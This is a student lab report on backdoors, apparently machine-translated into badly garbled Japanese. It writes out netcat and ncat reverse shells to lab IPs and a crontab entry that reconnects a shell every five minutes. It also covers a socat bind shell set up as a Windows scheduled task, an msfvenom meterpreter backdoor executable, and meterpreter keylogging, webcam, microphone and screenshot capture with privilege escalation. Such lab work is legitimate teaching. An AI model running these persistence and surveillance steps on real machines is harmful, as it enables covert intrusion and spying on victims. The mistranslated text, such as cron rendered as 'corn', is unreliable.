実際には、バックドアの原則に対する2019年から2020年のネットワーク技術20175207 EXP2

ディレクトリ

• 1つの関連する概念
  • 1.1バックドア？
  • 1.2バックドア？
• 2一般的なバックドア
  • 2.1 NC / netcatを
  • 2.2メーターPreter
  • 2.3トウモロコシ
• 3実験内容
  • 3.1シェル、cronの開始を操作するホストを取得するのnetcat
  • 3.2は、シェルを操作するタスクを開始する計画をホストを取得しsocatに関する
  • 3.3 MSFのmeterpreter実行ファイルsocatに関するNCAT使用またはホストに転送し、ホストは、シェル取得動作します
  • 3.4 MSFのmeterpreter生成されたコンテンツの取得対象ホストオーディオ、カメラ、キーロガーなど
  • シェルコードを使用して生成さ3.5 MSFは、リバウンド接続シェルを得、1回のpwn1の練習中に注ぎ
• 4つの思考問題
• 実験に遭遇した問題5
• 6まとめ体験

---

1つの関連する概念

1.1バックドア？

• バックドアは、通常の認証プロセスとチャネルシステムを介してアクセス可能ではありません。

1.2バックドア？

• コンパイラは、バックドアを残します
• 滞在バックドアへのオペレーティングシステム
• 滞在バックドアへの応用（最も一般的）
• バックドアを装ったオペレーティングシステム/アプリケーション固有の特別に潜みます

---

2一般的なバックドア

2.1 NC / netcatを

• 関連の発表
  • netcatをあなたがデータを読み書きするためのネットワーク接続を介してTCP / IPプロトコルを使用することができ、強力なネットワークユーティリティです
  • http://nc110.sourceforge.net/
  • http://netcat.sourceforge.net/。
• オファー以下の主要機能にアクセス
  • すべてのアウトバウンドとインバウンドポート（TCPまたはUDP）に接続されています
  • トンネルモード機能、それはまた、TCP UDPに、例えば、特定のトンネルを可能にし、すべてのネットワークパラメータ（リモート・ホストとのトンネルへの接続を許可する送信元ポート/インターフェースのリスニングポート/インターフェース）を指定することができます。
    内蔵ポートスキャン機能乱数発生器で
  • 高度そのような緩衝伝送モードとして使用オプション、（1行ごとにN秒）、16進ダンプでデータを送信し、受信した（または指定したファイルにstderrに）
  • オプションのRFC854のtelnetコードパーサーと応答
• システム
  • Linuxの場合：一般的にその使用のための説明書を参照してくださいするには、「manのnetcat」や「男のNC」、netcatを付属しています。
  • ダウンロードncat.rar、解凍を使用することができます
• 勝利は、Linuxのシェルを得るwin7の/カーリーLinuxベース
  • WindowsサーバのIPアドレスを取得します。ipconfig/all
    
  • 開閉可能な窓リスニング：ncat.exe -l -p 8888
  • Linuxは、接続ウィンドウでリバウンド：nc 192.168.137.133 8888 -e /bin/sh
  • Linuxのシェルを取得するには、Windowsは、任意のコマンドを実行することができます。私たちは試みるのlsコマンドを
    
• Linuxは勝つシェル得られます
  • LinuxのホストのIPアドレスを取得します。ifconfig/all
    
  • リスナーのコマンドを実行しているLinuxの場合：nc -l -p 8888
  • 接続のLinuxでWindowsのリバウンド：ncat.exe -e cmd.exe 192.168.137.130 8888
  • Linuxは、Windowsのコマンドプロンプトを参照してください。私たちはみてくださいDIRコマンドとにwhoamiコマンドを
    
• 知識の拡充のnetcat
  • 参考：① Netcatをユーザーガイド、② 導入方法を使用してnetcatを
  • socatに関する--Netcatプラス
    リファレンス：へsocatに関する入門
    Windowsのバージョンダウンロード

2.2メーターPreter

• 参考：① meterpreter利用レイダースの浸透した後、② どのようMeterpreter浸透Windowsシステムを使用する方法を教えて

2.3トウモロコシ

• トウモロコシのメカニズム
  • cronのは、与えられた仕事を実行するために指定した時刻にシステムをさせることができ、我々はcronのメカニズムを管理するために、crontabコマンドを使用することができます

• corntab表現

  +---------------- minute  分钟(0 - 59)
  |  +------------- hour    小时(0 - 23)
  |  |  +---------- day     日期(1 - 31)
  |  |  |  +------- month   月份(1 - 12)
  |  |  |  |  +---- week    星期(0 - 7) (星期天=0 or 7)
  |  |  |  |  |
  *  *  *  *  *  要运行的命令

• crontabのコマンド
  • man crontabViewコマンドマニュアル
• トウモロコシの使用例
  • トウモロコシのタスクの作成：
    crontab -e
    任意のエディタを選択し、私はnanoを使用しています
    */1 * * * * echo "Have a break now." >> /tmp/test.txt 毎分出力が/tmp/test.txtに今休憩を持っているが
    
  • 定期的なタスクを表示します。crontab -l
    
  • キャプチャ/tmp/test.txt
    

• 参考：① cronとcrontabのコマンド詳細、② シェルコマンド_Cron使用

---

3実験内容

3.1シェル、cronの開始を操作するホストを取得するのnetcat

• 勝利は聞くに転じ：ncat.exe -l -p 8888
• カーリーは起動にcron：5分ごとに、対応するIPホストのシェルを得るために、

crontab -e
*/5 * * * * /bin/netcat 192.168.137.133 8888 -e /bin/sh

五分後......

3.2は、シェルを操作するタスクを開始する計画をホストを取得しsocatに関する

• 勝利は socatに関するタスクを作成します
  • [コントロールパネル] - > [管理ツール] - > [タスクスケジューラ - >タスクを作成します（右サイドバー）
  • 一般：設定名は20175207 Iセットです
    
  • トリガー：新（以下提供）
    
  • アクション：（下に設けられた）を作成します
    ~~パスのためのプログラムやスクリプト〜socat.exe〜
    ~~追加パラメータとしてtcp-listen:8888 exec:cmd.exe,pty,stderr ポート8888にバインドされたCMD.EXEすると、CMD.EXEのstdoutにリダイレクト標準エラー出力
    
  • 注文確認
  • 20175207のビューのタスクのステータスが準備ができて、ファイル名を指定して実行]をクリックします
    
• カーリーの買収は、LinuxでシェルをCMD：socat - tcp:192.168.137.133:8888
  

3.3 MSFのmeterpreter実行ファイルsocatに関するNCAT使用またはホストに転送し、ホストは、シェル取得動作します

• カーリーの生成バックドアLinuxの実行
  注：このIP IPアドレス制御終了、すなわちホストのIPカーリー

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=8888 -f exe > 20175207_backdoor.exe

• 20175207_backdoor.exeバックドアファイルは、ホストwin7のに転送され、
  • 勝つ ncat.exe -lv 8888 > 20175207_backdoor.exe
    
  • カーリー nc 192.168.137.133 8888 < 20175207_backdoor.exe
    注：ここではIPアドレスはwin7の、すなわち、ホストIPとIP充電されています
  • win7の中のファイルを表示するには、バックドアがあります
    
• カーリーのリスニング
  • コンソールにMSF：msfconsole
    
  • 監視モジュールに配置されたペイロードを使用して、（次のように構成された）リスニング開始
    制御端子を使用してIPセットLHOST、すなわちカリIP：注
    
• ウィンバックドアを実行している
  ファイアウォールを経由して、事前には、バックドアを設定することができます
  

3.4 MSFのmeterpreter生成されたコンテンツの取得対象ホストオーディオ、カメラ、キーロガーなど

• オーディオを取得します。recorf_mic
  
  
• カメラを取得します：webcam_snap
  
  
• スクリーンショット：screenshot
  
  
• キーロガー
  • keyscan_start：キーボードのレコードを開きます。
  • キーボードの表示キャプチャログ情報：keyscan_dump
  • ストップキーロガー機能：keyscan_stop
    
• 右に言及：getsystem システムは、最高権威であります
• 現在のユーザーを表示します。getuid
  
  理由は、現在のユーザーの権利を言及するのに失敗は、管理者です

シェルコードを使用して生成さ3.5 MSFは、リバウンド接続シェルを得、1回のpwn1の練習中に注ぎ

4つの思考問題

• あなたは、あなたのシステムのバックドアを入力することも可能な方法のリストを考えることができますか？
  • ネットワーク・ファイル・バックドアからダウンロード
• あなたは（勝利/ Linux）を起動するために記載されているバックドアの道をどのように知っています
  • バックドア結合スレッド
  • レジストリを変更します。
• 何があなたをそこに機能Metepreterの印象的な配列を与えますか？
  • 建設シェルコード
  • ビューのプロセスと関連する操作
  • リモートデスクトップコントロール
  • このマシンモニタ
• どのようにあなたのシステムがバックドアをインストールされていない見つけるには？

実験に遭遇した問題5

• Win7の中にバックドアAPPCRASHのエラーが表示されますを実行します
  • 適切な解決策は、win10のための再手術、発見されません
• Win10が正常にタスクを作成した後で実行することはできません
  
  • ファイアウォールsocat.exeの通過を許可するようにファイアウォールを設定します
• タスクを実行した後カーリーホストを聞くことができません
  • ホストは、タスクを停止して、タスクを再実行します